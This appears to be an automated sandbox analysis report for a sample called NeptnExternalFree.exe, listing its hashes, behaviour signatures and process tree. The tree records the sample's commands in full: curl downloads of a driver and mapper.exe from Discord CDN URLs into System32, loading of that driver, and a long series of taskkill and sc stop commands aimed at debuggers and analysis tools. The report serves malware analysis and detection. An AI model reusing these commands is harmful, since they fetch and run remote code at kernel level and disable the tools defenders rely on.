Analysis
-
max time kernel
22s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
26-03-2023 02:05
Behavioral task
behavioral1
Sample
NeptnExternalFree.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
NeptnExternalFree.exe
Resource
win10v2004-20230220-en
General
-
Target
NeptnExternalFree.exe
-
Size
3.5MB
-
MD5
01e8ba61787a19bc8838fe845fdbeec1
-
SHA1
6ee449056214222388c91d147712c035a0e8dec2
-
SHA256
88ca77450527c906fe9d75e2f9f12280fa8dadd02691c15efdb487bd875499a6
-
SHA512
9fbb531764adfb9c6cae4735405d5d302eeb2bed85c028a5e69719b29b18f61f598ef1021bd6bb1ff5c826992b5c84e4c6d547d55b202127ee88ceec666ab6db
-
SSDEEP
49152:yn3wi5r0to7oRoAqcOBLCDjhYCuge31JXigR4Hd20Z3taNxPMb68OX6E8kFWOZR1:yA+YtuvcSyjhjovigRWnZ9MObTOLvf48
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
NeptnExternalFree.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NeptnExternalFree.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
mapper.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" mapper.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
NeptnExternalFree.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NeptnExternalFree.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NeptnExternalFree.exe -
Executes dropped EXE 1 IoCs
Processes:
mapper.exepid process 1440 mapper.exe -
Processes:
resource yara_rule behavioral2/memory/4904-133-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp themida behavioral2/memory/4904-134-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp themida behavioral2/memory/4904-135-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp themida behavioral2/memory/4904-136-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp themida behavioral2/memory/4904-383-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp themida -
Processes:
NeptnExternalFree.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NeptnExternalFree.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
curl.execurl.exedescription ioc process File created C:\Windows\System32\NeptnDriver.sys curl.exe File created C:\Windows\System32\mapper.exe curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
NeptnExternalFree.exepid process 4904 NeptnExternalFree.exe -
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4404 sc.exe 3012 sc.exe 2848 sc.exe 3956 sc.exe 1616 sc.exe 3408 sc.exe 1572 sc.exe 4724 sc.exe 376 sc.exe 3400 sc.exe 4664 sc.exe 2564 sc.exe 512 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 59 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1796 taskkill.exe 1364 taskkill.exe 1456 taskkill.exe 1272 taskkill.exe 2268 taskkill.exe 2260 taskkill.exe 4240 taskkill.exe 1372 taskkill.exe 1592 taskkill.exe 4168 taskkill.exe 2104 taskkill.exe 3588 taskkill.exe 2784 taskkill.exe 3024 taskkill.exe 1428 taskkill.exe 4788 taskkill.exe 2004 taskkill.exe 3384 taskkill.exe 4972 taskkill.exe 4956 taskkill.exe 3020 taskkill.exe 3400 taskkill.exe 3740 taskkill.exe 4312 taskkill.exe 3588 taskkill.exe 912 taskkill.exe 5092 taskkill.exe 4952 taskkill.exe 3336 taskkill.exe 856 taskkill.exe 2864 taskkill.exe 2864 taskkill.exe 3732 taskkill.exe 4696 taskkill.exe 4256 taskkill.exe 4092 taskkill.exe 2016 taskkill.exe 708 taskkill.exe 2532 taskkill.exe 2132 taskkill.exe 3692 taskkill.exe 708 taskkill.exe 4760 taskkill.exe 4580 taskkill.exe 5012 taskkill.exe 4276 taskkill.exe 1340 taskkill.exe 1052 taskkill.exe 3352 taskkill.exe 3092 taskkill.exe 5116 taskkill.exe 2820 taskkill.exe 4280 taskkill.exe 3564 taskkill.exe 2568 taskkill.exe 4236 taskkill.exe 1092 taskkill.exe 652 taskkill.exe 4564 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
msedge.exemsedge.exepid process 4780 msedge.exe 4780 msedge.exe 2748 msedge.exe 2748 msedge.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
mapper.exepid process 1440 mapper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
msedge.exepid process 2748 msedge.exe 2748 msedge.exe 2748 msedge.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exeTrustedInstaller.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exemapper.exetaskkill.exetaskkill.execmd.execmd.exetaskkill.execmd.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3352 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 1592 TrustedInstaller.exe Token: SeDebugPrivilege 3692 taskkill.exe Token: SeDebugPrivilege 3564 taskkill.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 2568 taskkill.exe Token: SeDebugPrivilege 4580 cmd.exe Token: SeDebugPrivilege 4168 taskkill.exe Token: SeDebugPrivilege 4788 taskkill.exe Token: SeDebugPrivilege 3740 taskkill.exe Token: SeDebugPrivilege 3336 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 4564 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeLoadDriverPrivilege 1440 mapper.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 1272 taskkill.exe Token: SeDebugPrivilege 2864 cmd.exe Token: SeDebugPrivilege 4312 cmd.exe Token: SeDebugPrivilege 708 taskkill.exe Token: SeDebugPrivilege 3092 cmd.exe Token: SeDebugPrivilege 2268 taskkill.exe Token: SeDebugPrivilege 856 taskkill.exe Token: SeDebugPrivilege 4236 cmd.exe Token: SeDebugPrivilege 2004 taskkill.exe Token: SeDebugPrivilege 2820 taskkill.exe Token: SeDebugPrivilege 2260 taskkill.exe Token: SeDebugPrivilege 1796 taskkill.exe Token: SeDebugPrivilege 5012 taskkill.exe Token: SeDebugPrivilege 4240 taskkill.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 2532 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 4972 taskkill.exe Token: SeDebugPrivilege 3020 taskkill.exe Token: SeDebugPrivilege 708 taskkill.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 2784 taskkill.exe Token: SeDebugPrivilege 4760 taskkill.exe Token: SeDebugPrivilege 3732 taskkill.exe Token: SeDebugPrivilege 4696 taskkill.exe Token: SeDebugPrivilege 4256 taskkill.exe Token: SeDebugPrivilege 4276 taskkill.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
msedge.exepid process 2748 msedge.exe 2748 msedge.exe 2748 msedge.exe 2748 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NeptnExternalFree.execmd.exemsedge.exedescription pid process target process PID 4904 wrote to memory of 3588 4904 NeptnExternalFree.exe cmd.exe PID 4904 wrote to memory of 3588 4904 NeptnExternalFree.exe cmd.exe PID 3588 wrote to memory of 2748 3588 cmd.exe msedge.exe PID 3588 wrote to memory of 2748 3588 cmd.exe msedge.exe PID 2748 wrote to memory of 4072 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 4072 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 3268 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 4780 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 4780 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe PID 2748 wrote to memory of 2764 2748 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://discord.gg/xCRS6yyPF62⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/xCRS6yyPF63⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa653046f8,0x7ffa65304708,0x7ffa653047184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys >nul 2>&12⤵
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&12⤵
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys2⤵
-
C:\Windows\System32\mapper.exeC:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq charles*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ida*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerProSdk3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker33⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker23⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker13⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop wireshark3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
